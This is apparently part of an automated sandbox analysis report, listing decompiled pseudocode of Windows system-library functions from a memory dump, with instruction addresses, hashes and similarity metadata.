				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x543d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E05370548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0538B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0535B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x5437c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E05367D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E05367D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E053C7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E05389830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E053C69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x5437c04 != 0) {
						_t118 = _v12;
						_t120 = E053CA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x5437bd8;
						if( *0x5437bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E053895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E053899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E053C3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0534B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0538AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x5438474 - 3;
										if( *0x5438474 != 3) {
											 *0x54379dc =  *0x54379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E05367D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E05367D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E053C7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x5438708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x5437b00; // 0x0
							asm("ror esi, cl");
							 *0x543b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E053895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E05357F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                      0x053703f1
                                      0x053703f7
                                      0x053703f9
                                      0x053703fb
                                      0x053703fd
                                      0x05370400
                                      0x0537040a
                                      0x053b4c7a
                                      0x05370537
                                      0x05370547
                                      0x05370410
                                      0x05370410
                                      0x05370414
                                      0x05370417
                                      0x0537041a
                                      0x05370421
                                      0x05370424
                                      0x0537042b
                                      0x0537043b
                                      0x0537043e
                                      0x0537043f
                                      0x0537043f
                                      0x05370446
                                      0x05370449
                                      0x0537044c
                                      0x0537044f
                                      0x05370459
                                      0x053b4c8d
                                      0x0537045f
                                      0x0537045f
                                      0x0537045f
                                      0x05370467
                                      0x053b4c97
                                      0x053b4c9d
                                      0x053b4ca4
                                      0x053b4caa
                                      0x053b4caf
                                      0x053b4cb1
                                      0x053b4cc3
                                      0x053b4cb3
                                      0x053b4cbc
                                      0x053b4cbc
                                      0x053b4cc8
                                      0x053b4ccb
                                      0x053b4cd7
                                      0x053b4cda
                                      0x053b4cdf
                                      0x053b4cdf
                                      0x053b4ccb
                                      0x053b4ca4
                                      0x0537046d
                                      0x0537046f
                                      0x0537046f
                                      0x05370471
                                      0x05370476
                                      0x0537047a
                                      0x0537047b
                                      0x05370483
                                      0x05370489
                                      0x0537048d
                                      0x00000000
                                      0x00000000
                                      0x053b4ce9
                                      0x053b4cef
                                      0x053b4d22
                                      0x053b4d22
                                      0x00000000
                                      0x053b4d22
                                      0x053b4cf1
                                      0x053b4cf7
                                      0x00000000
                                      0x00000000
                                      0x053b4cf9
                                      0x053b4cff
                                      0x00000000
                                      0x00000000
                                      0x053b4d05
                                      0x053b4d07
                                      0x00000000
                                      0x00000000
                                      0x053b4d0d
                                      0x053b4d0f
                                      0x053b4d14
                                      0x053b4d16
                                      0x00000000
                                      0x00000000
                                      0x053b4d1c
                                      0x053b4d1c
                                      0x05370499
                                      0x05370535
                                      0x05370535
                                      0x00000000
                                      0x05370535
                                      0x053704a6
                                      0x053b4d2c
                                      0x053b4d37
                                      0x053b4d39
                                      0x053b4d3b
                                      0x00000000
                                      0x00000000
                                      0x053b4d41
                                      0x053b4d48
                                      0x05370527
                                      0x0537052b
                                      0x0537052d
                                      0x05370530
                                      0x05370530
                                      0x00000000
                                      0x0537052b
                                      0x053b4d4e
                                      0x053704ac
                                      0x053704ac
                                      0x053704af
                                      0x053704b2
                                      0x053704b7
                                      0x053704b9
                                      0x053704bb
                                      0x053704bd
                                      0x053704bf
                                      0x053704c5
                                      0x053704c9
                                      0x053b4d53
                                      0x053b4d59
                                      0x053b4db9
                                      0x053b4dba
                                      0x053b4dbf
                                      0x053b4dc2
                                      0x053b4dc4
                                      0x053b4dc7
                                      0x053b4dce
                                      0x00000000
                                      0x053b4dce
                                      0x053b4d5b
                                      0x053b4d61
                                      0x00000000
                                      0x00000000
                                      0x053b4d63
                                      0x053b4d69
                                      0x00000000
                                      0x00000000
                                      0x053b4d6b
                                      0x053b4d6e
                                      0x053b4d74
                                      0x053b4d76
                                      0x053b4d7c
                                      0x053b4d7e
                                      0x053b4d84
                                      0x053b4d89
                                      0x053b4d8c
                                      0x053b4d8d
                                      0x053b4d92
                                      0x053b4d95
                                      0x053b4d96
                                      0x053b4d98
                                      0x053b4d9a
                                      0x053b4d9f
                                      0x053b4da4
                                      0x053b4da6
                                      0x053b4da8
                                      0x053b4daf
                                      0x053b4db1
                                      0x053b4db1
                                      0x053b4daf
                                      0x053b4da6
                                      0x053b4d84
                                      0x053b4d7c
                                      0x00000000
                                      0x053b4d74
                                      0x053704d6
                                      0x053b4de1
                                      0x053704dc
                                      0x053704dc
                                      0x053704dc
                                      0x053704e4
                                      0x053b4deb
                                      0x053b4df1
                                      0x053b4df8
                                      0x053b4dfe
                                      0x053b4e03
                                      0x053b4e05
                                      0x053b4e17
                                      0x053b4e07
                                      0x053b4e10
                                      0x053b4e10
                                      0x053b4e1c
                                      0x053b4e1f
                                      0x053b4e35
                                      0x053b4e35
                                      0x053b4e1f
                                      0x053b4df8
                                      0x053704f1
                                      0x053704fa
                                      0x053b4e3f
                                      0x053b4e47
                                      0x053b4e5b
                                      0x053b4e61
                                      0x053b4e67
                                      0x053b4e69
                                      0x053b4e71
                                      0x053b4e73
                                      0x05370500
                                      0x05370500
                                      0x05370500
                                      0x053704fa
                                      0x05370508
                                      0x0537051d
                                      0x0537051d
                                      0x0537051f
                                      0x05370524
                                      0x00000000
                                      0x05370524
                                      0x05370515
                                      0x05370517
                                      0x053b4e7a
                                      0x053b4e7c
                                      0x00000000
                                      0x00000000
                                      0x053b4e85
                                      0x00000000
                                      0x053b4e85
                                      0x00000000
                                      0x05370517

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53c1cba0726aa694f4accd652989b74b32e989287ec9b6c1f425b21dbdc0cea3
                                      • Instruction ID: 63a3d1329c9dffe56e820bb942490c7cebb26194a1ab9e292653c0f7159e379f
                                      • Opcode Fuzzy Hash: 53c1cba0726aa694f4accd652989b74b32e989287ec9b6c1f425b21dbdc0cea3
                                      • Instruction Fuzzy Hash: 75910931E042589BEF35DB68C84CBFD7BA6FB00724F050265E951A76D2D7B89D00CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534C600, Relevance: .2, Instructions: 225COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E0534C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x543d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E05356D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0538B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x5437b9c; // 0x0
					_t74 = L05364620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E05389650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L053677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0538F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E053813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L053677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E05389650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                      0x0534c608
                                      0x0534c615
                                      0x0534c625
                                      0x0534c62d
                                      0x0534c635
                                      0x0534c640
                                      0x0534c680
                                      0x0534c687
                                      0x0534c688
                                      0x0534c689
                                      0x0534c694
                                      0x0534c694
                                      0x0534c642
                                      0x0534c64a
                                      0x0534c697
                                      0x053b7a25
                                      0x053b7a2b
                                      0x053b7a2e
                                      0x053b7a30
                                      0x053b7bea
                                      0x053b7bea
                                      0x00000000
                                      0x053b7bea
                                      0x053b7a36
                                      0x053b7a43
                                      0x053b7a48
                                      0x053b7a4c
                                      0x053b7a4e
                                      0x00000000
                                      0x00000000
                                      0x053b7a58
                                      0x053b7a5a
                                      0x053b7a5b
                                      0x053b7a5c
                                      0x053b7a5d
                                      0x053b7a63
                                      0x053b7a64
                                      0x053b7a6a
                                      0x053b7a6c
                                      0x053b7a6e
                                      0x053b79cb
                                      0x053b79cb
                                      0x053b79ce
                                      0x053b79d0
                                      0x053b7a98
                                      0x053b7a9b
                                      0x053b7a9b
                                      0x053b7a9e
                                      0x053b7aa1
                                      0x053b7bbe
                                      0x053b7bbe
                                      0x053b7bc0
                                      0x053b7be0
                                      0x053b7be0
                                      0x053b7a01
                                      0x053b7a01
                                      0x053b7a05
                                      0x053b7a07
                                      0x053b7a15
                                      0x053b7a15
                                      0x053b7a1a
                                      0x00000000
                                      0x053b7a1a
                                      0x053b7bc2
                                      0x053b7bc6
                                      0x053b7bc9
                                      0x053b7bcd
                                      0x053b7bcf
                                      0x053b79e6
                                      0x053b79e6
                                      0x053b79eb
                                      0x053b79eb
                                      0x053b79ef
                                      0x053b79f1
                                      0x00000000
                                      0x00000000
                                      0x053b79f3
                                      0x053b79f5
                                      0x053b79ff
                                      0x053b79ff
                                      0x00000000
                                      0x053b79ff
                                      0x053b79f7
                                      0x053b79fd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053b79fd
                                      0x053b7bd5
                                      0x053b7bd8
                                      0x00000000
                                      0x00000000
                                      0x053b7ba9
                                      0x053b7bac
                                      0x053b7bb0
                                      0x053b7bb1
                                      0x053b7bb1
                                      0x053b7bb6
                                      0x00000000
                                      0x053b7bb6
                                      0x053b7aa7
                                      0x053b7aaa
                                      0x00000000
                                      0x00000000
                                      0x053b7ab2
                                      0x053b7ab3
                                      0x053b7ab5
                                      0x053b7aec
                                      0x053b7aef
                                      0x053b7b25
                                      0x053b7b28
                                      0x053b7b62
                                      0x053b7b64
                                      0x053b7b8f
                                      0x053b7b92
                                      0x053b7b96
                                      0x053b7b98
                                      0x00000000
                                      0x00000000
                                      0x053b7b9e
                                      0x053b7b9f
                                      0x053b7ba3
                                      0x00000000
                                      0x053b7ba3
                                      0x053b7b66
                                      0x053b7b68
                                      0x053b7ae2
                                      0x053b7ae2
                                      0x00000000
                                      0x053b7ae2
                                      0x053b7b6e
                                      0x053b7b72
                                      0x053b7b75
                                      0x053b7b81
                                      0x053b7b85
                                      0x053b7b87
                                      0x00000000
                                      0x00000000
                                      0x053b7b31
                                      0x053b7b34
                                      0x053b7b3c
                                      0x053b7b45
                                      0x053b7b46
                                      0x053b7b4f
                                      0x053b7b51
                                      0x053b7b57
                                      0x053b7b59
                                      0x053b7b59
                                      0x00000000
                                      0x053b7b59
                                      0x053b7b77
                                      0x00000000
                                      0x053b7b77
                                      0x053b7b2a
                                      0x00000000
                                      0x053b7b2a
                                      0x053b7af1
                                      0x053b7af3
                                      0x00000000
                                      0x00000000
                                      0x053b7afb
                                      0x053b7afc
                                      0x053b7afe
                                      0x00000000
                                      0x00000000
                                      0x053b7b00
                                      0x053b7b03
                                      0x00000000
                                      0x00000000
                                      0x053b7b05
                                      0x053b7b09
                                      0x053b7b0d
                                      0x053b7b0f
                                      0x00000000
                                      0x00000000
                                      0x053b7b18
                                      0x053b7b1d
                                      0x00000000
                                      0x053b7b1d
                                      0x053b7ab7
                                      0x053b7ab9
                                      0x00000000
                                      0x00000000
                                      0x053b7abf
                                      0x053b7ac1
                                      0x00000000
                                      0x00000000
                                      0x053b7ac3
                                      0x053b7ac6
                                      0x00000000
                                      0x00000000
                                      0x053b7ac8
                                      0x053b7acc
                                      0x053b7ad0
                                      0x053b7ad2
                                      0x00000000
                                      0x00000000
                                      0x053b7adb
                                      0x00000000
                                      0x053b7adb
                                      0x053b79d6
                                      0x053b79d9
                                      0x053b79dc
                                      0x053b7a91
                                      0x053b7a94
                                      0x00000000
                                      0x053b7a94
                                      0x053b79e2
                                      0x00000000
                                      0x053b79e2
                                      0x053b7a74
                                      0x053b7a7a
                                      0x00000000
                                      0x00000000
                                      0x053b7a8a
                                      0x053b7a21
                                      0x053b7a21
                                      0x00000000
                                      0x053b7a21
                                      0x0534c650
                                      0x0534c651
                                      0x0534c656
                                      0x0534c65c
                                      0x0534c65d
                                      0x0534c663
                                      0x0534c664
                                      0x0534c66a
                                      0x0534c66e
                                      0x053b79c5
                                      0x053b79c7
                                      0x00000000
                                      0x053b79c7
                                      0x0534c67a
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8022c6d7295c7494f39870a1930b1548d0242a86e86d6ff466f50a6677ed447c
                                      • Instruction ID: b29f5cac1b56b5861c2908fe2969a41b5466c24916037eeb4c0c8ee1b20f5e5a
                                      • Opcode Fuzzy Hash: 8022c6d7295c7494f39870a1930b1548d0242a86e86d6ff466f50a6677ed447c
                                      • Instruction Fuzzy Hash: 5481A4756182058BEB25CE14C880FBB77E9FBC4350F14481AEE469BB41D3B0DD45CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C6DC9, Relevance: .2, Instructions: 199COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E053C6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E053C6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E05367D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E05389AE0();
					_t87 = L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E053C795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E053C795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E053C795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E053C795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L05364620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E053C6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E053C6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E053C6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E053C6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E05367D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E05389AE0();
								L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L05362400( &_v36);
							if(_v24 >= 0) {
								_t87 = L05362400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L05362400( &_v52);
							}
							if(_v28 >= 0) {
								return L05362400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                      0x053c6dd4
                                      0x053c6dde
                                      0x053c6de1
                                      0x053c6de3
                                      0x053c6de6
                                      0x053c6de9
                                      0x053c6dec
                                      0x053c6def
                                      0x053c6df2
                                      0x053c6df5
                                      0x053c6dfe
                                      0x053c6e04
                                      0x053c6e09
                                      0x053c6e0d
                                      0x053c6e18
                                      0x053c6e1b
                                      0x053c6e22
                                      0x053c6e2d
                                      0x053c6e30
                                      0x053c6e36
                                      0x053c6e42
                                      0x053c6e4d
                                      0x053c6e50
                                      0x053c6e55
                                      0x053c6e5c
                                      0x053c6e6e
                                      0x053c6e5e
                                      0x053c6e67
                                      0x053c6e67
                                      0x053c6e73
                                      0x053c6e74
                                      0x053c6e77
                                      0x053c6e7c
                                      0x053c6e7d
                                      0x053c6e8e
                                      0x053c6e93
                                      0x053c6e9c
                                      0x053c6ea8
                                      0x053c6eab
                                      0x053c6eac
                                      0x053c6eb3
                                      0x053c6ecd
                                      0x053c6edc
                                      0x053c6ee2
                                      0x053c6ee5
                                      0x053c6ef2
                                      0x053c6efb
                                      0x053c6f01
                                      0x053c6f06
                                      0x053c6f0b
                                      0x053c6f11
                                      0x053c6f1a
                                      0x053c6f22
                                      0x053c6f26
                                      0x053c6f26
                                      0x053c6f33
                                      0x053c6f41
                                      0x053c6f44
                                      0x053c6f47
                                      0x053c6f54
                                      0x053c6f65
                                      0x053c6f77
                                      0x053c6f7c
                                      0x053c6f82
                                      0x053c6f91
                                      0x053c6f99
                                      0x053c6fa3
                                      0x053c6fae
                                      0x053c6fae
                                      0x053c6fba
                                      0x053c6fbb
                                      0x053c6fbc
